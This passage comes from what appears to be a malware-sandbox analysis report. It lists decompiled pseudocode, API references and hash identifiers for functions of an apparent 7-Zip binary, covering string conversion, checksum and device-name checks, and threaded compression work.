										_t84 =  *((intOrPtr*)(_t73 + _t48 - 0x5c));
									} while ( *((intOrPtr*)(_t73 + _t48 - 0x5c)) != 0);
								}
								E0041FA61( *((intOrPtr*)(_t72 + 0x1a)), _t73 + _t48 - 0x5c);
								E0040C0D3(_t73 - 0x1c, _t84, _t73 - 0x5c);
							}
						}
					}
				}
				E0040C2B2(_t73 - 0x1c, _t84,  *((intOrPtr*)(_t73 + 0x14)));
				 *(_t73 - 4) =  *(_t73 - 4) | 0xffffffff;
				E0040C20F(_t73 - 0x1c);
				 *[fs:0x0] =  *((intOrPtr*)(_t73 - 0xc));
				return 0;
			}












                                                                      0x0041f98a
                                                                      0x0041f996
                                                                      0x0041f99a
                                                                      0x0041f9a1
                                                                      0x0041f9a4
                                                                      0x0041f9a7
                                                                      0x0041fa17
                                                                      0x0041fa1a
                                                                      0x0041fa1d
                                                                      0x0041fa1f
                                                                      0x0041fa22
                                                                      0x0041fa29
                                                                      0x0041fa2c
                                                                      0x0041fa2e
                                                                      0x0041fa2f
                                                                      0x00000000
                                                                      0x0041fa2f
                                                                      0x0041fa2c
                                                                      0x0041f9a9
                                                                      0x0041f9a9
                                                                      0x0041f9aa
                                                                      0x0041fa07
                                                                      0x0041fa0a
                                                                      0x0041fa0d
                                                                      0x0041fa0f
                                                                      0x0041fa12
                                                                      0x0041fa30
                                                                      0x0041fa33
                                                                      0x0041fa33
                                                                      0x0041f9ac
                                                                      0x0041f9af
                                                                      0x0041f9b5
                                                                      0x0041f9bb
                                                                      0x0041f9c0
                                                                      0x0041f9c3
                                                                      0x0041f9cd
                                                                      0x0041f9cd
                                                                      0x0041f9da
                                                                      0x0041f9df
                                                                      0x0041f9e4
                                                                      0x0041f9e6
                                                                      0x0041f9e6
                                                                      0x0041f9e7
                                                                      0x0041f9e7
                                                                      0x0041f9e6
                                                                      0x0041f9f4
                                                                      0x0041fa00
                                                                      0x0041fa00
                                                                      0x0041f9bb
                                                                      0x0041f9af
                                                                      0x0041f9aa
                                                                      0x0041fa3e
                                                                      0x0041fa43
                                                                      0x0041fa4a
                                                                      0x0041fa56
                                                                      0x0041fa5e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: BCJ $LZMA:
                                                                      • API String ID: 3519838083-462996315
                                                                      • Opcode ID: f5aaf2dcd8d2c36660c37db49121751ca9f9939531ab36ddaff5a2b567419d6b
                                                                      • Instruction ID: 4fee4bf0a5429e26f45d53a1c5358177aa4f1e25947415e94ebe7a5a98c2da02
                                                                      • Opcode Fuzzy Hash: f5aaf2dcd8d2c36660c37db49121751ca9f9939531ab36ddaff5a2b567419d6b
                                                                      • Instruction Fuzzy Hash: D821AB72D10249DFCB14EFA5C5908EE7B71AF10340B50817EE026AB696D73CA98BCB58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040816E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040816E(intOrPtr __ecx, short** __edx, void* __edi, void* __eflags) {
				intOrPtr _t36;
				int _t42;
				char* _t54;
				void* _t61;
				short** _t65;
				void* _t68;

				E0046B890(E00473818, _t68);
				 *((intOrPtr*)(_t68 - 0x10)) = __ecx;
				_t65 = __edx;
				 *((intOrPtr*)(_t68 - 0x18)) = 0;
				 *(_t68 - 0x24) = 0;
				 *(_t68 - 0x20) = 0;
				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
				E00401EEE(_t68 - 0x24, 3);
				 *((intOrPtr*)(_t68 - 4)) = 0;
				 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = 0;
				_t36 =  *((intOrPtr*)(__edx + 4));
				if(_t36 != 0) {
					_t61 = _t36 + _t36;
					if(_t61 >=  *((intOrPtr*)(_t68 - 0x1c))) {
						E00401EEE(_t68 - 0x24, _t61);
					}
					_t54 = _t68 + 0xc;
					_t42 = WideCharToMultiByte( *(_t68 + 8), 0,  *_t65, _t65[1],  *(_t68 - 0x24), _t61 + 1, _t54, _t68 - 0x14);
					 *((char*)( *((intOrPtr*)(_t68 + 0x10)))) = _t54 & 0xffffff00 |  *(_t68 - 0x14) != 0x00000000;
					if(_t42 == 0) {
						 *((intOrPtr*)(_t68 + 0x10)) = 0x44e75;
						_t42 = E0046B8F4(_t68 + 0x10, 0x47e128);
					}
					( *(_t68 - 0x24))[_t42] = 0;
					 *(_t68 - 0x20) = _t42;
				}
				E00401E64( *((intOrPtr*)(_t68 - 0x10)), _t68 - 0x24);
				E00407A18( *(_t68 - 0x24));
				 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
				return  *((intOrPtr*)(_t68 - 0x10));
			}









                                                                      0x00408173
                                                                      0x0040817c
                                                                      0x00408182
                                                                      0x00408189
                                                                      0x0040818c
                                                                      0x0040818f
                                                                      0x00408192
                                                                      0x00408195
                                                                      0x0040819d
                                                                      0x004081a0
                                                                      0x004081a2
                                                                      0x004081a7
                                                                      0x004081aa
                                                                      0x004081b0
                                                                      0x004081b6
                                                                      0x004081b6
                                                                      0x004081c4
                                                                      0x004081d3
                                                                      0x004081e5
                                                                      0x004081e7
                                                                      0x004081f2
                                                                      0x004081f9
                                                                      0x004081f9
                                                                      0x00408201
                                                                      0x00408204
                                                                      0x00408204
                                                                      0x0040820e
                                                                      0x00408216
                                                                      0x00408224
                                                                      0x0040822c

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00408173
                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,?,00000004,00000003,00000001,?,00000000,59@,00000003,?,00000000,00407F1C,00000000), ref: 004081D3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharH_prologMultiWide
                                                                      • String ID: 59@
                                                                      • API String ID: 3731712410-2780377667
                                                                      • Opcode ID: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                      • Instruction ID: af53ffafe5e3b4cbac78d31c94e9b62b0eb73677ea79480e45141f723c5d0b6c
                                                                      • Opcode Fuzzy Hash: 3e30b8be08c219df50001418e773fcd6df8581cd43d08f32ffd015183181abdc
                                                                      • Instruction Fuzzy Hash: 24213C72900249DFCB14DF99C9819EEBBF8FF49300B50446EE815B7251C739AE04CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00414B6B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00414B6B(void* __eflags) {
				char _t32;
				void* _t37;
				char _t39;
				void* _t55;
				intOrPtr _t58;
				void* _t59;

				E0046B890(E00474780, _t59);
				_t39 = 0;
				 *((intOrPtr*)(_t59 - 0x20)) = 0;
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				 *((intOrPtr*)(_t59 - 4)) = 0;
				if(L00413C1F(_t59 - 0x28, 0x500) != 0) {
					_t58 =  *((intOrPtr*)(_t59 - 0x20));
					_t32 = 0;
					do {
						 *((char*)(_t32 + _t58)) = _t32;
						_t32 = _t32 + 1;
					} while (_t32 < 0x100);
					if(E00414C43(_t32, _t58, 0x100) == 0x29058c73) {
						 *((intOrPtr*)(_t59 - 0x1c)) = 0x159a55e5;
						 *((intOrPtr*)(_t59 - 0x18)) = 0x1f123bb5;
						E00414C74(_t58 + 0x100, 0x400, _t59 - 0x1c);
						 *((intOrPtr*)(_t59 - 0x14)) = 0;
						do {
							_t36 =  *((intOrPtr*)(_t59 - 0x14));
							 *(_t59 - 0x10) =  *(_t59 - 0x10) & 0x00000000;
							_t55 =  *((intOrPtr*)(_t59 - 0x14)) + _t58;
							while(1) {
								_t37 = E00414C43(_t36, _t55,  *(_t59 - 0x10));
								if(_t37 != E0046B1C0(_t55,  *(_t59 - 0x10))) {
									break;
								}
								 *(_t59 - 0x10) =  *(_t59 - 0x10) + 1;
								if( *(_t59 - 0x10) < 0x20) {
									continue;
								} else {
									goto L8;
								}
								goto L10;
							}
							_t39 = 0;
							goto L10;
							L8:
							 *((intOrPtr*)(_t59 - 0x14)) =  *((intOrPtr*)(_t59 - 0x14)) + 1;
						} while ( *((intOrPtr*)(_t59 - 0x14)) < 0x4e0);
						_t39 = 1;
					}
				}
				L10:
				 *((intOrPtr*)(_t59 - 0x28)) = 0x47aacc;
				E004585E0( *((intOrPtr*)(_t59 - 0x20)));
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				return _t39;
			}









                                                                      0x00414b70
                                                                      0x00414b79
                                                                      0x00414b7d
                                                                      0x00414b80
                                                                      0x00414b8f
                                                                      0x00414b99
                                                                      0x00414b9f
                                                                      0x00414ba2
                                                                      0x00414ba9
                                                                      0x00414ba9
                                                                      0x00414bac
                                                                      0x00414bad
                                                                      0x00414bbd
                                                                      0x00414bce
                                                                      0x00414bd5
                                                                      0x00414bdc
                                                                      0x00414be1
                                                                      0x00414be4
                                                                      0x00414be4
                                                                      0x00414be7
                                                                      0x00414beb
                                                                      0x00414bee
                                                                      0x00414bf3
                                                                      0x00414c06
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414c08
                                                                      0x00414c0f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00414c0f
                                                                      0x00414c3f
                                                                      0x00000000
                                                                      0x00414c11
                                                                      0x00414c11
                                                                      0x00414c14
                                                                      0x00414c1d
                                                                      0x00414c1d
                                                                      0x00414bbd
                                                                      0x00414c1f
                                                                      0x00414c22
                                                                      0x00414c29
                                                                      0x00414c36
                                                                      0x00414c3e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: $[<A
                                                                      • API String ID: 3519838083-980560344
                                                                      • Opcode ID: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                      • Instruction ID: a66645b3afa9c2ee447036ac3f63c81d7f7369c510e48348743a797e60edc476
                                                                      • Opcode Fuzzy Hash: fc09c8835bf1d1419033baf57481bdbf59988f115ef5698bf44c214e65704d7e
                                                                      • Instruction Fuzzy Hash: BD218E70A012198BCF04EFA5C5806EEB776FFD8308F64441FC502B7241EB789A85CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416E2C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E00416E2C(intOrPtr __ecx) {
				void* _t24;
				void* _t27;
				intOrPtr* _t30;
				signed int _t49;
				intOrPtr* _t52;
				void* _t54;

				E0046B890(E00474B74, _t54);
				 *((intOrPtr*)(_t54 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x48bf2c;
				do {
					_t49 = 0;
					_t52 =  *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x10))));
					if( *_t52 != 0) {
						_t30 = _t52;
						do {
							_t49 = _t49 + 1;
							_t30 = _t30 + 2;
						} while ( *_t30 != 0);
					}
					_t37 =  *((intOrPtr*)(_t54 - 0x14));
					if( *((intOrPtr*)( *((intOrPtr*)(_t54 - 0x14)) + 4)) < _t49) {
						goto L7;
					} else {
						E00407399(_t37, _t54 - 0x20, _t49);
						 *(_t54 - 4) = 0;
						_t27 = E0040807A(_t52);
						 *(_t54 - 4) =  *(_t54 - 4) | 0xffffffff;
						E00407A18( *((intOrPtr*)(_t54 - 0x20)));
						if((0 | _t27 != 0x00000000) != 0 || E00416EDE( *((intOrPtr*)(_t54 - 0x14)), _t49) != 0) {
							goto L7;
						} else {
							L9:
							_t24 = 0;
						}
					}
					L11:
					 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
					return _t24;
					L7:
					 *((intOrPtr*)(_t54 - 0x10)) =  *((intOrPtr*)(_t54 - 0x10)) + 4;
				} while ( *((intOrPtr*)(_t54 - 0x10)) < 0x48bf3c);
				if(E00416F4A( *((intOrPtr*)(_t54 - 0x14)), 0x48bf68) != 0) {
					_t24 = E00416F4A( *((intOrPtr*)(_t54 - 0x14)), 0x48bf60);
				} else {
					goto L9;
				}
				goto L11;
			}









                                                                      0x00416e31
                                                                      0x00416e3c
                                                                      0x00416e3f
                                                                      0x00416e46
                                                                      0x00416e4b
                                                                      0x00416e4d
                                                                      0x00416e52
                                                                      0x00416e54
                                                                      0x00416e56
                                                                      0x00416e56
                                                                      0x00416e58
                                                                      0x00416e59
                                                                      0x00416e56
                                                                      0x00416e5e
                                                                      0x00416e64
                                                                      0x00000000
                                                                      0x00416e66
                                                                      0x00416e6b
                                                                      0x00416e74
                                                                      0x00416e77
                                                                      0x00416e84
                                                                      0x00416e88
                                                                      0x00416e90
                                                                      0x00000000
                                                                      0x00416ebe
                                                                      0x00416ebe
                                                                      0x00416ebe
                                                                      0x00416ebe
                                                                      0x00416e90
                                                                      0x00416ecf
                                                                      0x00416ed5
                                                                      0x00416edd
                                                                      0x00416ea0
                                                                      0x00416ea0
                                                                      0x00416ea4
                                                                      0x00416ebc
                                                                      0x00416eca
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: COM$LPT
                                                                      • API String ID: 3519838083-915345583
                                                                      • Opcode ID: d26558381b6772eea968b0d54f164c3262fecb6ff468361b5f304004559fcc44
                                                                      • Instruction ID: 7fc7bf41c9544355426c18039b4ebced735f38342408f175ac6efea5b4200ce5
                                                                      • Opcode Fuzzy Hash: d26558381b6772eea968b0d54f164c3262fecb6ff468361b5f304004559fcc44
                                                                      • Instruction Fuzzy Hash: FD118135E00215CBCF10EFA5C9415EEB376EF85318B11866FD511A7291C7389D86CBA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004080C7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E004080C7(intOrPtr __ecx, char** __edx, void* __eflags) {
				signed int _t33;
				intOrPtr _t48;
				char** _t52;
				void* _t55;

				E0046B890(E00473804, _t55);
				 *((intOrPtr*)(_t55 - 0x10)) = __ecx;
				_t52 = __edx;
				 *((intOrPtr*)(_t55 - 0x14)) = 0;
				 *(_t55 - 0x20) = 0;
				 *(_t55 - 0x1c) = 0;
				 *((intOrPtr*)(_t55 - 0x18)) = 0;
				E00401E9A(_t55 - 0x20, 3);
				_t48 =  *((intOrPtr*)(__edx + 4));
				 *((intOrPtr*)(_t55 - 4)) = 0;
				if(_t48 != 0) {
					if(_t48 >=  *((intOrPtr*)(_t55 - 0x18))) {
						E00401E9A(_t55 - 0x20, _t48);
					}
					_t33 = MultiByteToWideChar( *(_t55 + 8), 0,  *_t52, _t52[1],  *(_t55 - 0x20), _t48 + 1);
					if(_t33 == 0) {
						 *(_t55 + 8) = 0x44e74;
						_t33 = E0046B8F4(_t55 + 8, 0x47e128);
					}
					( *(_t55 - 0x20))[_t33] = 0;
					 *(_t55 - 0x1c) = _t33;
				}
				E004039C0( *((intOrPtr*)(_t55 - 0x10)), _t55 - 0x20);
				E00407A18( *(_t55 - 0x20));
				 *[fs:0x0] =  *((intOrPtr*)(_t55 - 0xc));
				return  *((intOrPtr*)(_t55 - 0x10));
			}







                                                                      0x004080cc
                                                                      0x004080d6
                                                                      0x004080dc
                                                                      0x004080e3
                                                                      0x004080e6
                                                                      0x004080e9
                                                                      0x004080ec
                                                                      0x004080ef
                                                                      0x004080f4
                                                                      0x004080f7
                                                                      0x004080fc
                                                                      0x00408101
                                                                      0x00408107
                                                                      0x00408107
                                                                      0x0040811c
                                                                      0x00408124
                                                                      0x0040812f
                                                                      0x00408136
                                                                      0x00408136
                                                                      0x0040813e
                                                                      0x00408142
                                                                      0x00408142
                                                                      0x0040814c
                                                                      0x00408154
                                                                      0x00408163
                                                                      0x0040816b

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 004080CC
                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,00000002,?,?,00000003,59@,?,00000000,?,?,?,?,00000000), ref: 0040811C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharH_prologMultiWide
                                                                      • String ID: 59@
                                                                      • API String ID: 3731712410-2780377667
                                                                      • Opcode ID: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                      • Instruction ID: d702833a8b0d2e9c08c0512ca54372eb887272844dd4864684de151fd06ec4aa
                                                                      • Opcode Fuzzy Hash: c5154a1bd991084fb26572e5af563df919d859aa9556be1335024a578bc19ce4
                                                                      • Instruction Fuzzy Hash: 8D11F9B1900119AFCF10EF9AC9819EEBBB9FF88354B40443EE545B7251D7386A41CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045B510 Relevance: 5.1, APIs: 4, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0045B510(intOrPtr* __ecx, intOrPtr __edx) {
				intOrPtr _v4;
				signed int _v8;
				void* __ebx;
				void* __ebp;
				void* _t45;
				signed int _t51;
				intOrPtr _t53;
				void* _t64;
				struct _CRITICAL_SECTION* _t65;
				intOrPtr _t90;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr _t101;
				struct _CRITICAL_SECTION* _t102;

				_t91 = __edx;
				_t97 = __ecx;
				while(1) {
					L1:
					_v8 = 0;
					E00467AC0( *((intOrPtr*)(_t97 + 0x13c)));
					_t45 = E00467B10(_t97 + 0x140);
					while( *((intOrPtr*)(_t97 + 0x130)) == 0) {
						if( *((intOrPtr*)(_t97 + 0x134)) != 0) {
							 *((intOrPtr*)(_t97 + 0x170)) = _v8;
							E00467B10(_t97 + 0x144);
							goto L1;
						}
						_t98 =  *((intOrPtr*)(_t97 + 0x178));
						if(E00459DE0(_t45, _t65, _t98, _t91) == 0) {
							E00467AC0( *((intOrPtr*)(_t97 + 0x148)));
							E00459E00(_t98, _t91);
							_t50 =  *((intOrPtr*)(_t98 + 4));
							if( *((intOrPtr*)(_t98 + 4)) > 0xffffdfff) {
								E00459D10(_t50 -  *((intOrPtr*)(_t98 + 0x5c)), _t98, _t50 -  *((intOrPtr*)(_t98 + 0x5c)) - 1);
								_t91 =  *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4;
								E0045A1C0(_t50 -  *((intOrPtr*)(_t98 + 0x5c)) - 1,  *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4,  *((intOrPtr*)(_t98 + 0x28)) + 1);
							}
							_t51 = _v8;
							_t101 =  *((intOrPtr*)(_t98 + 0xc)) -  *((intOrPtr*)(_t98 + 4));
							_t65 = ((_t51 & 0x00000007) << 0xf) +  *((intOrPtr*)(_t97 + 0xf8));
							_v8 = _t51 + 1;
							 *_t65 = 2;
							 *((intOrPtr*)(_t65 + 4)) = _t101;
							_t53 =  *((intOrPtr*)(_t98 + 0x48));
							if(_t101 >= _t53) {
								_t101 = _t101 + 1 - _t53;
								if(_t101 > 0x1ffe) {
									_t101 = 0x1ffe;
								}
								_t91 =  *((intOrPtr*)(_t98 + 4));
								 *((intOrPtr*)( *((intOrPtr*)(_t97 + 0x174))))( *((intOrPtr*)(_t98 + 0x20)) +  *(_t98 + 0x60) * 4,  *((intOrPtr*)(_t98 + 0x28)), _t65 + 8, _t101, _t98 + 0x70);
								 *_t65 =  *_t65 + _t101;
							}
							 *((intOrPtr*)(_t98 + 4)) =  *((intOrPtr*)(_t98 + 4)) + _t101;
							 *_t98 =  *_t98 + _t101;
							_t45 = L00467C30(_t97 + 0x14c);
						} else {
							_t65 = _t97 + 0x5c;
							EnterCriticalSection(_t65);
							_t102 = _t97 + 0x158;
							EnterCriticalSection(_t102);
							_v4 = E00459CF0(_t98);
							E00459DB0(_t98);
							_t64 = E00459CF0(_t98);
							_t90 = _v4;
							_t91 = _t64 - _t90;
							 *_t97 =  *_t97 + _t64 - _t90;
							_t45 = _t64 - _t90;
							 *((intOrPtr*)(_t97 + 0x118)) =  *((intOrPtr*)(_t97 + 0x118)) + _t45;
							LeaveCriticalSection(_t65);
							LeaveCriticalSection(_t102);
						}
					}
					return _t45;
				}
			}

















                                                                      0x0045b510
                                                                      0x0045b517
                                                                      0x0045b520
                                                                      0x0045b520
                                                                      0x0045b526
                                                                      0x0045b52e
                                                                      0x0045b539
                                                                      0x0045b540
                                                                      0x0045b554
                                                                      0x0045b67d
                                                                      0x0045b689
                                                                      0x00000000
                                                                      0x0045b689
                                                                      0x0045b55a
                                                                      0x0045b569
                                                                      0x0045b5c1
                                                                      0x0045b5c8
                                                                      0x0045b5cd
                                                                      0x0045b5d5
                                                                      0x0045b5e1
                                                                      0x0045b5f0
                                                                      0x0045b5f6
                                                                      0x0045b5f6
                                                                      0x0045b5fb
                                                                      0x0045b602
                                                                      0x0045b60d
                                                                      0x0045b614
                                                                      0x0045b618
                                                                      0x0045b61e
                                                                      0x0045b621
                                                                      0x0045b626
                                                                      0x0045b62f
                                                                      0x0045b637
                                                                      0x0045b639
                                                                      0x0045b639
                                                                      0x0045b654
                                                                      0x0045b660
                                                                      0x0045b662
                                                                      0x0045b662
                                                                      0x0045b664
                                                                      0x0045b667
                                                                      0x0045b66f
                                                                      0x0045b56b
                                                                      0x0045b56b
                                                                      0x0045b56f
                                                                      0x0045b575
                                                                      0x0045b57c
                                                                      0x0045b58b
                                                                      0x0045b58f
                                                                      0x0045b596
                                                                      0x0045b59b
                                                                      0x0045b5a7
                                                                      0x0045b5a9
                                                                      0x0045b5ab
                                                                      0x0045b5ad
                                                                      0x0045b5b4
                                                                      0x0045b5b7
                                                                      0x0045b5b7
                                                                      0x0045b569
                                                                      0x0045b69a
                                                                      0x0045b69a

                                                                      APIs
                                                                        • Part of subcall function 00467AC0: WaitForSingleObject.KERNEL32(?,000000FF,004146EB), ref: 00467AC3
                                                                        • Part of subcall function 00467B10: SetEvent.KERNEL32(00000000,00410FDF), ref: 00467B13
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0045B56F
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0045B57C
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0045B5B4
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0045B5B7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$EventObjectSingleWait
                                                                      • String ID:
                                                                      • API String ID: 497781136-0
                                                                      • Opcode ID: 363cd7293d6a614269b236afac2ebfd5d812988adaed9e844cedbbb4af3ceb87
